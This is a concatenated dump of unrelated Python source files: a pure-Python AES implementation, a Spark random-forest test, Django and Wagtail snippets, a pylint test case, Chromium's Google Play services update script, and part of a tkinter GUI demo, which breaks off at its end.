#print 'ShiftRows :', b
def mix_columns(self, block):
"""MixColumns step. Mixes the values in each column"""
# Cache global multiplication tables (see below)
mul_by_2 = gf_mul_by_2
mul_by_3 = gf_mul_by_3
# Since we're dealing with a transposed matrix, columns are already
# sequential
for i in xrange(4):
col = i * 4
#v0, v1, v2, v3 = block[col : col+4]
v0, v1, v2, v3 = (block[col], block[col + 1], block[col + 2],
block[col + 3])
block[col ] = mul_by_2[v0] ^ v3 ^ v2 ^ mul_by_3[v1]
block[col+1] = mul_by_2[v1] ^ v0 ^ v3 ^ mul_by_3[v2]
block[col+2] = mul_by_2[v2] ^ v1 ^ v0 ^ mul_by_3[v3]
block[col+3] = mul_by_2[v3] ^ v2 ^ v1 ^ mul_by_3[v0]
#print 'MixColumns :', block
def mix_columns_inv(self, block):
"""Similar to mix_columns above, but performed in inverse for decryption."""
# Cache global multiplication tables (see below)
mul_9 = gf_mul_by_9
mul_11 = gf_mul_by_11
mul_13 = gf_mul_by_13
mul_14 = gf_mul_by_14
# Since we're dealing with a transposed matrix, columns are already
# sequential
for i in xrange(4):
col = i * 4
v0, v1, v2, v3 = (block[col], block[col + 1], block[col + 2],
block[col + 3])
#v0, v1, v2, v3 = block[col:col+4]
block[col ] = mul_14[v0] ^ mul_9[v3] ^ mul_13[v2] ^ mul_11[v1]
block[col+1] = mul_14[v1] ^ mul_9[v0] ^ mul_13[v3] ^ mul_11[v2]
block[col+2] = mul_14[v2] ^ mul_9[v1] ^ mul_13[v0] ^ mul_11[v3]
block[col+3] = mul_14[v3] ^ mul_9[v2] ^ mul_13[v1] ^ mul_11[v0]
#print 'MixColumns :', block
def encrypt_block(self, block):
"""Encrypts a single block. This is the main AES function"""
# For efficiency reasons, the state between steps is transmitted via a
# mutable array, not returned.
self.add_round_key(block, 0)
for round in xrange(1, self.rounds):
self.sub_bytes(block, aes_sbox)
self.shift_rows(block)
self.mix_columns(block)
self.add_round_key(block, round)
self.sub_bytes(block, aes_sbox)
self.shift_rows(block)
# no mix_columns step in the last round
self.add_round_key(block, self.rounds)
def decrypt_block(self, block):
"""Decrypts a single block. This is the main AES decryption function"""
# For efficiency reasons, the state between steps is transmitted via a
# mutable array, not returned.
self.add_round_key(block, self.rounds)
# count rounds down from 15 ... 1
for round in xrange(self.rounds-1, 0, -1):
self.shift_rows_inv(block)
self.sub_bytes(block, aes_inv_sbox)
self.add_round_key(block, round)
self.mix_columns_inv(block)
self.shift_rows_inv(block)
self.sub_bytes(block, aes_inv_sbox)
self.add_round_key(block, 0)
# no mix_columns step in the last round
#### ECB mode implementation
class ECBMode(object):
"""Electronic CodeBook (ECB) mode encryption.
Basically this mode applies the cipher function to each block individually;
no feedback is done. NB! This is insecure for almost all purposes
"""
def __init__(self, cipher):
self.cipher = cipher
self.block_size = cipher.block_size
def ecb(self, data, block_func):
"""Perform ECB mode with the given function"""
if len(data) % self.block_size != 0:
raise ValueError, "Plaintext length must be multiple of 16"
block_size = self.block_size
data = array('B', data)
for offset in xrange(0, len(data), block_size):
block = data[offset : offset+block_size]
block_func(block)
data[offset : offset+block_size] = block
return data.tostring()
def encrypt(self, data):
"""Encrypt data in ECB mode"""
return self.ecb(data, self.cipher.encrypt_block)
def decrypt(self, data):
"""Decrypt data in ECB mode"""
return self.ecb(data, self.cipher.decrypt_block)
#### CBC mode
class CBCMode(object):
"""Cipher Block Chaining (CBC) mode encryption. This mode avoids content leaks.
In CBC encryption, each plaintext block is XORed with the ciphertext block
preceding it; decryption is simply the inverse.
"""
# A better explanation of CBC can be found here:
# http://en.wikipedia.org/wiki/Block_cipher_modes_of_operation#Cipher-block_chaining_.28CBC.29
def __init__(self, cipher, IV):
self.cipher = cipher
self.block_size = cipher.block_size
self.IV = array('B', IV)
def encrypt(self, data):
"""Encrypt data in CBC mode"""
block_size = self.block_size
if len(data) % block_size != 0:
raise ValueError, "Plaintext length must be multiple of 16"
data = array('B', data)
IV = self.IV
for offset in xrange(0, len(data), block_size):
block = data[offset : offset+block_size]
# Perform CBC chaining
for i in xrange(block_size):
block[i] ^= IV[i]
self.cipher.encrypt_block(block)
data[offset : offset+block_size] = block
IV = block
self.IV = IV
return data.tostring()
def decrypt(self, data):
"""Decrypt data in CBC mode"""
block_size = self.block_size
if len(data) % block_size != 0:
raise ValueError, "Ciphertext length must be multiple of 16"
data = array('B', data)
IV = self.IV
for offset in xrange(0, len(data), block_size):
ctext = data[offset : offset+block_size]
block = ctext[:]
self.cipher.decrypt_block(block)
# Perform CBC chaining
#for i in xrange(block_size):
# data[offset + i] ^= IV[i]
for i in xrange(block_size):
block[i] ^= IV[i]
data[offset : offset+block_size] = block
IV = ctext
#data[offset : offset+block_size] = block
self.IV = IV
return data.tostring()
####
def galois_multiply(a, b):
"""Galois Field multiplicaiton for AES"""
p = 0
while b:
if b & 1:
p ^= a
a <<= 1
if a & 0x100:
a ^= 0x1b
b >>= 1
return p & 0xff
# Precompute the multiplication tables for encryption
gf_mul_by_2 = array('B', [galois_multiply(x, 2) for x in range(256)])
gf_mul_by_3 = array('B', [galois_multiply(x, 3) for x in range(256)])
# ... for decryption
gf_mul_by_9 = array('B', [galois_multiply(x, 9) for x in range(256)])
gf_mul_by_11 = array('B', [galois_multiply(x, 11) for x in range(256)])
gf_mul_by_13 = array('B', [galois_multiply(x, 13) for x in range(256)])
gf_mul_by_14 = array('B', [galois_multiply(x, 14) for x in range(256)])
####
# The S-box is a 256-element array, that maps a single byte value to another
# byte value. Since it's designed to be reversible, each value occurs only once
# in the S-box
#
# More information: http://en.wikipedia.org/wiki/Rijndael_S-box
aes_sbox = array('B',
'637c777bf26b6fc53001672bfed7ab76'
'ca82c97dfa5947f0add4a2af9ca472c0'
'b7fd9326363ff7cc34a5e5f171d83115'
'04c723c31896059a071280e2eb27b275'
'09832c1a1b6e5aa0523bd6b329e32f84'
'53d100ed20fcb15b6acbbe394a4c58cf'
'd0efaafb434d338545f9027f503c9fa8'
'51a3408f929d38f5bcb6da2110fff3d2'
'cd0c13ec5f974417c4a77e3d645d1973'
'60814fdc222a908846eeb814de5e0bdb'
'e0323a0a4906245cc2d3ac629195e479'
'e7c8376d8dd54ea96c56f4ea657aae08'
'ba78252e1ca6b4c6e8dd741f4bbd8b8a'
'703eb5664803f60e613557b986c11d9e'
'e1f8981169d98e949b1e87e9ce5528df'
'8ca1890dbfe6426841992d0fb054bb16'.decode('hex')
)
# This is the inverse of the above. In other words:
# aes_inv_sbox[aes_sbox[val]] == val
aes_inv_sbox = array('B',
'52096ad53036a538bf40a39e81f3d7fb'
'7ce339829b2fff87348e4344c4dee9cb'
'547b9432a6c2233dee4c950b42fac34e'
'082ea16628d924b2765ba2496d8bd125'
'72f8f66486689816d4a45ccc5d65b692'
'6c704850fdedb9da5e154657a78d9d84'
'90d8ab008cbcd30af7e45805b8b34506'
'd02c1e8fca3f0f02c1afbd0301138a6b'
'3a9111414f67dcea97f2cfcef0b4e673'
'96ac7422e7ad3585e2f937e81c75df6e'
'47f11a711d29c5896fb7620eaa18be1b'
'fc563e4bc6d279209adbc0fe78cd5af4'
'1fdda8338807c731b11210592780ec5f'
'60517fa919b54a0d2de57a9f93c99cef'
'a0e03b4dae2af5b0c8ebbb3c83539961'
'172b047eba77d626e169146355210c7d'.decode('hex')
)
# The Rcon table is used in AES's key schedule (key expansion)
# It's a pre-computed table of exponentation of 2 in AES's finite field
#
# More information: http://en.wikipedia.org/wiki/Rijndael_key_schedule
aes_Rcon = array('B',
'8d01020408102040801b366cd8ab4d9a'
'2f5ebc63c697356ad4b37dfaefc59139'
'72e4d3bd61c29f254a943366cc831d3a'
'74e8cb8d01020408102040801b366cd8'
'ab4d9a2f5ebc63c697356ad4b37dfaef'
'c5913972e4d3bd61c29f254a943366cc'
'831d3a74e8cb8d01020408102040801b'
'366cd8ab4d9a2f5ebc63c697356ad4b3'
'7dfaefc5913972e4d3bd61c29f254a94'
'3366cc831d3a74e8cb8d010204081020'
'40801b366cd8ab4d9a2f5ebc63c69735'
'6ad4b37dfaefc5913972e4d3bd61c29f'
'254a943366cc831d3a74e8cb8d010204'
'08102040801b366cd8ab4d9a2f5ebc63'
'c697356ad4b37dfaefc5913972e4d3bd'
'61c29f254a943366cc831d3a74e8cb'.decode('hex')
)
|
rodorad/spark-tk
|
refs/heads/master
|
integration-tests/tests/test_random_forest_classifier.py
|
3
|
# vim: set encoding=utf-8
# Copyright (c) 2016 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from setup import tc, rm, get_sandbox_path
import logging
logger = logging.getLogger(__name__)
def test_random_forest_classifier(tc):
logger.info("define schema")
schema = [("Class", int),("Dim_1", float),("Dim_2", float)]
logger.info("creating the frame")
data = [[1,19.8446136104,2.2985856384],
[1,16.8973559126,2.6933495054],
[1,5.5548729596,2.7777687995],
[0,46.1810010826,3.1611961917],
[0,44.3117586448,3.3458963222],
[0,34.6334526911,3.6429838715],
[1,11.4849647497,3.8530199663],
[0,43.7438430327,3.9347590844],
[0,44.961185029,4.0953872464],
[0,37.0549734365,4.1039157849],
[0,52.0093009461,4.1455433148],
[0,38.6092023162,4.1615595686],
[0,33.8789730794,4.1970765922],
[1,-1.0388754777,4.4190319518],
[0,49.913080358,4.5445142439],
[1,3.2789270744,4.8419490458],
[1,9.7921007601,4.8870605498],
[0,45.5778621825,4.9665753213],
[0,45.4773893261,5.0764210643],
[0,44.303211041,5.1112029237],
[0,52.8429742116,5.4121654741],
[1,14.8057269164,5.5634291719],
[0,42.6043814342,5.5988383751],
[1,13.7291123825,5.6684973484],
[0,50.7410573499,5.6901229975],
[0,52.0093990181,5.7401924186]]
f = tc.frame.create(data, schema=schema)
logger.info(f.inspect())
logger.info("training the model on the frame")
model = tc.models.classification.random_forest_classifier.train(f, 'Class', ['Dim_1', 'Dim_2'], num_classes=2)
logger.info("predicting the class using the model and the frame")
predict_frame = model.predict(f)
assert(set(predict_frame.column_names) == set(['Class', 'Dim_1', 'Dim_2','predicted_class']))
assert(len(predict_frame.column_names) == 4)
metrics = model.test(f)
assert(metrics.accuracy == 1.0)
assert(metrics.f_measure == 1.0)
assert(metrics.precision == 1.0)
assert(metrics.recall == 1.0)
|
MiltosD/CEFELRC
|
refs/heads/master
|
lib/python2.7/site-packages/django/contrib/messages/models.py
|
634
|
# Models module required so tests are discovered.
|
100Shapes/wagtail
|
refs/heads/master
|
wagtail/contrib/wagtailstyleguide/views.py
|
5
|
from django import forms
from django.shortcuts import render
from django.utils.translation import ugettext as _
from django.contrib import messages
from django.contrib.auth.decorators import permission_required
from wagtail.wagtailadmin.forms import SearchForm
CHOICES = (
('choice1', 'choice 1'),
('choice2', 'choice 2'),
)
class ExampleForm(forms.Form):
text = forms.CharField(required=True, help_text="help text")
url = forms.URLField(required=True)
email = forms.EmailField(max_length=254)
date = forms.DateField()
time = forms.TimeField()
select = forms.ChoiceField(choices=CHOICES)
boolean = forms.BooleanField(required=False)
@permission_required('wagtailadmin.access_admin')
def index(request):
form = SearchForm(placeholder=_("Search something"))
example_form = ExampleForm()
messages.success(request, _("Success message"))
messages.warning(request, _("Warning message"))
messages.error(request, _("Error message"))
fake_pagination = {
'number': 1,
'previous_page_number': 1,
'next_page_number': 2,
'has_previous': True,
'has_next': True,
'paginator': {
'num_pages': 10,
},
}
return render(request, 'wagtailstyleguide/base.html', {
'search_form': form,
'example_form': example_form,
'fake_pagination': fake_pagination,
})
|
anhstudios/swganh
|
refs/heads/develop
|
data/scripts/templates/object/draft_schematic/structure/shared_installation_mining_organic_creature.py
|
2
|
#### NOTICE: THIS FILE IS AUTOGENERATED
#### MODIFICATIONS MAY BE LOST IF DONE IMPROPERLY
#### PLEASE SEE THE ONLINE DOCUMENTATION FOR EXAMPLES
from swgpy.object import *
def create(kernel):
result = Intangible()
result.template = "object/draft_schematic/structure/shared_installation_mining_organic_creature.iff"
result.attribute_template_id = -1
result.stfName("string_id_table","")
#### BEGIN MODIFICATIONS ####
#### END MODIFICATIONS ####
return result
|
dreki/GitSavvy
|
refs/heads/master
|
git_savvy.py
|
4
|
import sys
import sublime
if sys.version_info[0] == 2:
raise ImportWarning("GitSavvy does not support Sublime Text 2.")
else:
def plugin_loaded():
from .common import util
util.file.determine_syntax_files()
# Ensure all interfaces are ready.
sublime.set_timeout_async(
lambda: util.view.refresh_gitsavvy(sublime.active_window().active_view()))
from .common.commands import *
from .common.ui import *
from .common.global_events import *
from .core.commands import *
from .core.interfaces import *
from .github.commands import *
|
lucidmotifs/auto-aoc
|
refs/heads/master
|
.venv/lib/python3.5/site-packages/pylint/test/functional/bad_indentation.py
|
12
|
# pylint: disable=missing-docstring, pointless-statement
from __future__ import print_function
def totoo():
print('malindented') # [bad-indentation]
def tutuu():
print('good indentation')
def titii():
1 # and this. # [bad-indentation]
def tataa(kdict):
for key in ['1', '2', '3']:
key = key.lower()
if key in kdict:
del kdict[key]
|
chrisdickinson/nojs
|
refs/heads/master
|
build/android/play_services/update.py
|
1
|
#!/usr/bin/env python
# Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
'''
Script to help uploading and downloading the Google Play services library to
and from a Google Cloud storage.
'''
import argparse
import logging
import os
import re
import shutil
import sys
import tempfile
import zipfile
sys.path.append(os.path.join(os.path.dirname(__file__), os.pardir))
import devil_chromium
from devil.utils import cmd_helper
from play_services import utils
from pylib import constants
from pylib.constants import host_paths
from pylib.utils import logging_utils
sys.path.append(os.path.join(host_paths.DIR_SOURCE_ROOT, 'build'))
import find_depot_tools # pylint: disable=import-error,unused-import
import breakpad
import download_from_google_storage
import upload_to_google_storage
# Directory where the SHA1 files for the zip and the license are stored
# It should be managed by git to provided information about new versions.
SHA1_DIRECTORY = os.path.join(host_paths.DIR_SOURCE_ROOT, 'build', 'android',
'play_services')
# Default bucket used for storing the files.
GMS_CLOUD_STORAGE = 'chromium-android-tools/play-services'
# Path to the default configuration file. It exposes the currently installed
# version of the library in a human readable way.
CONFIG_DEFAULT_PATH = os.path.join(host_paths.DIR_SOURCE_ROOT, 'build',
'android', 'play_services', 'config.json')
LICENSE_FILE_NAME = 'LICENSE'
ZIP_FILE_NAME = 'google_play_services_library.zip'
GMS_PACKAGE_ID = 'extras;google;m2repository' # used by sdk manager
LICENSE_PATTERN = re.compile(r'^Pkg\.License=(?P<text>.*)$', re.MULTILINE)
def main(raw_args):
parser = argparse.ArgumentParser(
description=__doc__ + 'Please see the subcommand help for more details.',
formatter_class=utils.DefaultsRawHelpFormatter)
subparsers = parser.add_subparsers(title='commands')
# Download arguments
parser_download = subparsers.add_parser(
'download',
help='download the library from the cloud storage',
description=Download.__doc__,
formatter_class=utils.DefaultsRawHelpFormatter)
parser_download.set_defaults(func=Download)
AddBasicArguments(parser_download)
AddBucketArguments(parser_download)
# SDK Update arguments
parser_sdk = subparsers.add_parser(
'sdk',
help='get the latest Google Play services SDK using Android SDK Manager',
description=UpdateSdk.__doc__,
formatter_class=utils.DefaultsRawHelpFormatter)
parser_sdk.set_defaults(func=UpdateSdk)
AddBasicArguments(parser_sdk)
# Upload arguments
parser_upload = subparsers.add_parser(
'upload',
help='upload the library to the cloud storage',
description=Upload.__doc__,
formatter_class=utils.DefaultsRawHelpFormatter)
parser_upload.set_defaults(func=Upload)
AddBasicArguments(parser_upload)
AddBucketArguments(parser_upload)
args = parser.parse_args(raw_args)
if args.verbose:
logging.basicConfig(level=logging.DEBUG)
logging_utils.ColorStreamHandler.MakeDefault(not _IsBotEnvironment())
devil_chromium.Initialize()
return args.func(args)
def AddBasicArguments(parser):
'''
Defines the common arguments on subparser rather than the main one. This
allows to put arguments after the command: `foo.py upload --debug --force`
instead of `foo.py --debug upload --force`
'''
parser.add_argument('--sdk-root',
help='base path to the Android SDK tools root',
default=constants.ANDROID_SDK_ROOT)
parser.add_argument('-v', '--verbose',
action='store_true',
help='print debug information')
def AddBucketArguments(parser):
parser.add_argument('--bucket',
help='name of the bucket where the files are stored',
default=GMS_CLOUD_STORAGE)
parser.add_argument('--config',
help='JSON Configuration file',
default=CONFIG_DEFAULT_PATH)
parser.add_argument('--dry-run',
action='store_true',
help=('run the script in dry run mode. Files will be '
'copied to a local directory instead of the '
'cloud storage. The bucket name will be as path '
'to that directory relative to the repository '
'root.'))
parser.add_argument('-f', '--force',
action='store_true',
help='run even if the library is already up to date')
def Download(args):
'''
Downloads the Google Play services library from a Google Cloud Storage bucket
and installs it to
//third_party/android_tools/sdk/extras/google/m2repository.
A license check will be made, and the user might have to accept the license
if that has not been done before.
'''
if not os.path.isdir(args.sdk_root):
logging.debug('Did not find the Android SDK root directory at "%s".',
args.sdk_root)
if not args.force:
logging.info('Skipping, not on an android checkout.')
return 0
config = utils.ConfigParser(args.config)
paths = PlayServicesPaths(args.sdk_root, config.version_number,
config.clients)
if os.path.isdir(paths.package) and not os.access(paths.package, os.W_OK):
logging.error('Failed updating the Google Play Services library. '
'The location is not writable. Please remove the '
'directory (%s) and try again.', paths.package)
return -2
new_lib_zip_sha1 = os.path.join(SHA1_DIRECTORY, ZIP_FILE_NAME + '.sha1')
logging.debug('Comparing zip hashes: %s and %s', new_lib_zip_sha1,
paths.lib_zip_sha1)
if utils.FileEquals(new_lib_zip_sha1, paths.lib_zip_sha1) and not args.force:
logging.info('Skipping, the Google Play services library is up to date.')
return 0
bucket_path = _VerifyBucketPathFormat(args.bucket,
config.version_number,
args.dry_run)
tmp_root = tempfile.mkdtemp()
try:
# setup the destination directory
if not os.path.isdir(paths.package):
os.makedirs(paths.package)
# download license file from bucket/{version_number}/license.sha1
new_license = os.path.join(tmp_root, LICENSE_FILE_NAME)
license_sha1 = os.path.join(SHA1_DIRECTORY, LICENSE_FILE_NAME + '.sha1')
_DownloadFromBucket(bucket_path, license_sha1, new_license,
args.verbose, args.dry_run)
if (not _IsBotEnvironment() and
not _CheckLicenseAgreement(new_license, paths.license,
config.version_number)):
logging.warning('Your version of the Google Play services library is '
'not up to date. You might run into issues building '
'or running the app. Please run `%s download` to '
'retry downloading it.', __file__)
return 0
new_lib_zip = os.path.join(tmp_root, ZIP_FILE_NAME)
_DownloadFromBucket(bucket_path, new_lib_zip_sha1, new_lib_zip,
args.verbose, args.dry_run)
try:
# Remove the deprecated sdk directory.
deprecated_package_path = os.path.join(args.sdk_root, 'extras', 'google',
'google_play_services')
if os.path.exists(deprecated_package_path):
shutil.rmtree(deprecated_package_path)
# We remove the current version of the Google Play services SDK.
if os.path.exists(paths.package):
shutil.rmtree(paths.package)
os.makedirs(paths.package)
logging.debug('Extracting the library to %s', paths.package)
with zipfile.ZipFile(new_lib_zip, "r") as new_lib_zip_file:
new_lib_zip_file.extractall(paths.package)
logging.debug('Copying %s to %s', new_license, paths.license)
shutil.copy(new_license, paths.license)
logging.debug('Copying %s to %s', new_lib_zip_sha1, paths.lib_zip_sha1)
shutil.copy(new_lib_zip_sha1, paths.lib_zip_sha1)
logging.info('Update complete.')
except Exception as e: # pylint: disable=broad-except
logging.error('Failed updating the Google Play Services library. '
'An error occurred while installing the new version in '
'the SDK directory: %s ', e)
return -3
finally:
shutil.rmtree(tmp_root)
return 0
def UpdateSdk(args):
'''
Uses the Android SDK Manager to download the latest Google Play services SDK
locally. Its usual installation path is
//third_party/android_tools/sdk/extras/google/m2repository
'''
# This should function should not run on bots and could fail for many user
# and setup related reasons. Also, exceptions here are not caught, so we
# disable breakpad to avoid spamming the logs.
breakpad.IS_ENABLED = False
# `android update sdk` fails if the library is not installed yet, but it does
# not allow to install it from scratch using the command line. We then create
# a fake outdated installation.
paths = PlayServicesPaths(args.sdk_root, 'no_version_number', [])
if not os.path.isfile(paths.source_prop):
if not os.path.exists(os.path.dirname(paths.source_prop)):
os.makedirs(os.path.dirname(paths.source_prop))
with open(paths.source_prop, 'w') as prop_file:
prop_file.write('Pkg.Revision=0.0.0\n')
sdk_manager = os.path.join(args.sdk_root, 'tools', 'bin', 'sdkmanager')
cmd_helper.Call([sdk_manager, GMS_PACKAGE_ID])
# If no update is needed, it still returns successfully so we just do nothing
return 0
def Upload(args):
'''
Uploads the library from the local Google Play services SDK to a Google Cloud
storage bucket. The version of the library and the list of clients to be
uploaded will be taken from the configuration file. (see --config parameter)
By default, a local commit will be made at the end of the operation.
'''
# This should function should not run on bots and could fail for many user
# and setup related reasons. Also, exceptions here are not caught, so we
# disable breakpad to avoid spamming the logs.
breakpad.IS_ENABLED = False
config = utils.ConfigParser(args.config)
paths = PlayServicesPaths(args.sdk_root, config.version_number,
config.clients)
logging.debug('-- Loaded paths --\n%s\n------------------', paths)
tmp_root = tempfile.mkdtemp()
try:
new_lib_zip = os.path.join(tmp_root, ZIP_FILE_NAME)
new_license = os.path.join(tmp_root, LICENSE_FILE_NAME)
_ZipLibrary(new_lib_zip, paths.client_paths, paths.package)
_ExtractLicenseFile(new_license, paths.source_prop)
bucket_path = _VerifyBucketPathFormat(args.bucket, config.version_number,
args.dry_run)
files_to_upload = [new_lib_zip, new_license]
logging.debug('Uploading %s to %s', files_to_upload, bucket_path)
_UploadToBucket(bucket_path, files_to_upload, args.dry_run)
new_lib_zip_sha1 = os.path.join(SHA1_DIRECTORY,
ZIP_FILE_NAME + '.sha1')
new_license_sha1 = os.path.join(SHA1_DIRECTORY,
LICENSE_FILE_NAME + '.sha1')
shutil.copy(new_lib_zip + '.sha1', new_lib_zip_sha1)
shutil.copy(new_license + '.sha1', new_license_sha1)
finally:
shutil.rmtree(tmp_root)
logging.info('Update to version %s complete', config.version_number)
return 0
def _DownloadFromBucket(bucket_path, sha1_file, destination, verbose,
is_dry_run):
'''Downloads the file designated by the provided sha1 from a cloud bucket.'''
download_from_google_storage.download_from_google_storage(
input_filename=sha1_file,
base_url=bucket_path,
gsutil=_InitGsutil(is_dry_run),
num_threads=1,
directory=None,
recursive=False,
force=False,
output=destination,
ignore_errors=False,
sha1_file=sha1_file,
verbose=verbose,
auto_platform=True,
extract=False)
def _UploadToBucket(bucket_path, files_to_upload, is_dry_run):
'''Uploads the files designated by the provided paths to a cloud bucket. '''
upload_to_google_storage.upload_to_google_storage(
input_filenames=files_to_upload,
base_url=bucket_path,
gsutil=_InitGsutil(is_dry_run),
force=False,
use_md5=False,
num_threads=1,
skip_hashing=False,
gzip=None)
def _InitGsutil(is_dry_run):
'''Initialize the Gsutil object as regular or dummy version for dry runs. '''
if is_dry_run:
return DummyGsutil()
else:
return download_from_google_storage.Gsutil(
download_from_google_storage.GSUTIL_DEFAULT_PATH)
def _ExtractLicenseFile(license_path, prop_file_path):
with open(prop_file_path, 'r') as prop_file:
prop_file_content = prop_file.read()
match = LICENSE_PATTERN.search(prop_file_content)
if not match:
raise AttributeError('The license was not found in ' +
os.path.abspath(prop_file_path))
with open(license_path, 'w') as license_file:
license_file.write(match.group('text'))
def _CheckLicenseAgreement(expected_license_path, actual_license_path,
version_number):
'''
Checks that the new license is the one already accepted by the user. If it
isn't, it prompts the user to accept it. Returns whether the expected license
has been accepted.
'''
if utils.FileEquals(expected_license_path, actual_license_path):
return True
with open(expected_license_path) as license_file:
# Uses plain print rather than logging to make sure this is not formatted
# by the logger.
print ('Updating the Google Play services SDK to '
'version %s.' % version_number)
# The output is buffered when running as part of gclient hooks. We split
# the text here and flush is explicitly to avoid having part of it dropped
# out.
# Note: text contains *escaped* new lines, so we split by '\\n', not '\n'.
for license_part in license_file.read().split('\\n'):
print license_part
sys.stdout.flush()
# Need to put the prompt on a separate line otherwise the gclient hook buffer
# only prints it after we received an input.
print ('Do you accept the license for version %s of the Google Play services '
'client library? [y/n]: ' % version_number)
sys.stdout.flush()
return raw_input('> ') in ('Y', 'y')
def _IsBotEnvironment():
return bool(os.environ.get('CHROME_HEADLESS'))
def _VerifyBucketPathFormat(bucket_name, version_number, is_dry_run):
'''
Formats and checks the download/upload path depending on whether we are
running in dry run mode or not. Returns a supposedly safe path to use with
Gsutil.
'''
if is_dry_run:
bucket_path = os.path.abspath(os.path.join(bucket_name,
str(version_number)))
if not os.path.isdir(bucket_path):
os.makedirs(bucket_path)
else:
if bucket_name.startswith('gs://'):
# We enforce the syntax without gs:// for consistency with the standalone
# download/upload scripts and to make dry run transition easier.
raise AttributeError('Please provide the bucket name without the gs:// '
'prefix (e.g. %s)' % GMS_CLOUD_STORAGE)
bucket_path = 'gs://%s/%s' % (bucket_name, version_number)
return bucket_path
def _ZipLibrary(zip_name, files, zip_root):
with zipfile.ZipFile(zip_name, 'w', zipfile.ZIP_DEFLATED) as zipf:
for file_name in files:
zipf.write(file_name, os.path.relpath(file_name, zip_root))
class PlayServicesPaths(object):
'''
Describes the different paths to be used in the update process.
Filesystem hierarchy | Exposed property / notes
---------------------------------------------------|-------------------------
[sdk_root] | sdk_root / (1)
+- extras |
+- google |
+- m2repository | package / (2)
+- source.properties | source_prop / (3)
+- LICENSE | license / (4)
+- google_play_services_library.zip.sha1 | lib_zip_sha1 / (5)
+- com/google/android/gms/ |
+- [play-services-foo] |
+- [X.Y.Z] |
+- play-services-foo-X.Y.Z.aar | client_paths / (6)
Notes:
1. sdk_root: Path provided as a parameter to the script (--sdk_root)
2. package: This directory contains the Google Play services SDK itself.
When downloaded via the Android SDK manager, it will be a complete maven,
repository with the different versions of the library. When the update
script downloads the library from our cloud storage, it is cleared.
3. source_prop: File created by the Android SDK manager that contains
the package information, such as the version info and the license.
4. license: File created by the update script. Contains the license accepted
by the user.
5. lib_zip_sha1: sha1 of the library that has been installed by the
update script. It is compared with the one required by the config file to
check if an update is necessary.
6. client_paths: The client library jars we care about. They are zipped
zipped together and uploaded to the cloud storage.
'''
def __init__(self, sdk_root, version_number, client_names):
'''
sdk_root: path to the root of the sdk directory
version_number: version of the library supposed to be installed locally.
client_names: names of client libraries to be uploaded. See
utils.ConfigParser for more info.
'''
relative_package = os.path.join('extras', 'google', 'm2repository')
self.sdk_root = sdk_root
self.version_number = version_number
self.package = os.path.join(sdk_root, relative_package)
self.lib_zip_sha1 = os.path.join(self.package, ZIP_FILE_NAME + '.sha1')
self.license = os.path.join(self.package, LICENSE_FILE_NAME)
self.source_prop = os.path.join(self.package, 'source.properties')
self.client_paths = []
for client in client_names:
self.client_paths.append(os.path.join(
self.package, 'com', 'google', 'android', 'gms', client,
version_number, '%s-%s.aar' % (client, version_number)))
def __repr__(self):
return ("\nsdk_root: " + self.sdk_root +
"\nversion_number: " + self.version_number +
"\npackage: " + self.package +
"\nlib_zip_sha1: " + self.lib_zip_sha1 +
"\nlicense: " + self.license +
"\nsource_prop: " + self.source_prop +
"\nclient_paths: \n - " + '\n - '.join(self.client_paths))
class DummyGsutil(download_from_google_storage.Gsutil):
'''
Class that replaces Gsutil to use a local directory instead of an online
bucket. It relies on the fact that Gsutil commands are very similar to shell
ones, so for the ones used here (ls, cp), it works to just use them with a
local directory.
'''
def __init__(self):
super(DummyGsutil, self).__init__(
download_from_google_storage.GSUTIL_DEFAULT_PATH)
def call(self, *args):
logging.debug('Calling command "%s"', str(args))
return cmd_helper.GetCmdStatusOutputAndError(args)
def check_call(self, *args):
logging.debug('Calling command "%s"', str(args))
return cmd_helper.GetCmdStatusOutputAndError(args)
if __name__ == '__main__':
sys.exit(main(sys.argv[1:]))
|
simontakite/sysadmin
|
refs/heads/master
|
pythonscripts/learningPython/Gui/Tools/big_gui.py
|
2
|
"""
GUI demo implementation - combines maker, mixin, and this
"""
import sys, os
from tkinter import * # widget classes
from PP4E.Gui.Tools.guimixin import * # mix-in methods: quit, spawn, etc.
from PP4E.Gui.Tools.guimaker import * # frame, plus menu/toolbar builder
class Hello(GuiMixin, GuiMakerWindowMenu): # or GuiMakerFrameMenu
def start(self):
self.hellos = 0
self.master.title("GuiMaker Demo")
self.master.iconname("GuiMaker")
def spawnme(): self.spawn('big_gui.py') # defer call vs lambda
self.menuBar = [ # a tree: 3 pull downs
('File', 0, # (pull-down)
[('New...', 0, spawnme),
('Open...', 0, self.fileOpen), # [menu items list]
('Quit', 0, self.quit)] # label,underline,action
),
('Edit', 0,
[('Cut', -1, self.notdone), # no underline|action
('Paste', -1, self.notdone), # lambda:0 works too
'separator', # add a separator
('Stuff', -1,
[('Clone', -1, self.clone), # cascaded submenu
('More', -1, self.more)]
),
('Delete', -1, lambda:0),
[5]] # disable 'delete'
),
('Play', 0,
[('Hello', 0, self.greeting),
('Popup...', 0, self.dialog),
('Demos', 0,
[('Toplevels', 0,
lambda: self.spawn(r'..\Tour\toplevel2.py')),
('Frames', 0,
lambda: self.spawn(r'..\Tour\demoAll-frm-ridge.py')),
('Images', 0,
lambda: self.spawn(r'..\Tour\buttonpics.py')),
('Alarm', 0,
lambda: self.spawn(r'..\Tour\alarm.py', wait=False)),
('Other...', -1, self.pickDemo)]
)]
)]
self.toolBar = [ # add 3 buttons
('Quit', self.quit, dict(side=RIGHT)), # or {'side': RIGHT}
('Hello', self.greeting, dict(side=LEFT)),
('Popup', self.dialog, dict(side=LEFT, expand=YES)) ]
def makeWidgets(self): # override default
middle = Label(self, text='Hello maker world!', # middle of window
width=40, height=10,
relief=SUNKEN, cursor='pencil', bg='white')
middle.pack(expand=YES, fill=BOTH)
def greeting(self):
self.hellos += 1
if self.hellos % 3:
print("hi")
else:
self.infobox("Three", 'HELLO!') # on every third press
def dialog(self):
button = self.question('OOPS!',
'You typed "rm*" ... continue?', # old style
'questhead', ('yes', 'no')) # args ignored
[lambda: None, self.quit][button]()
def fileOpen(self):
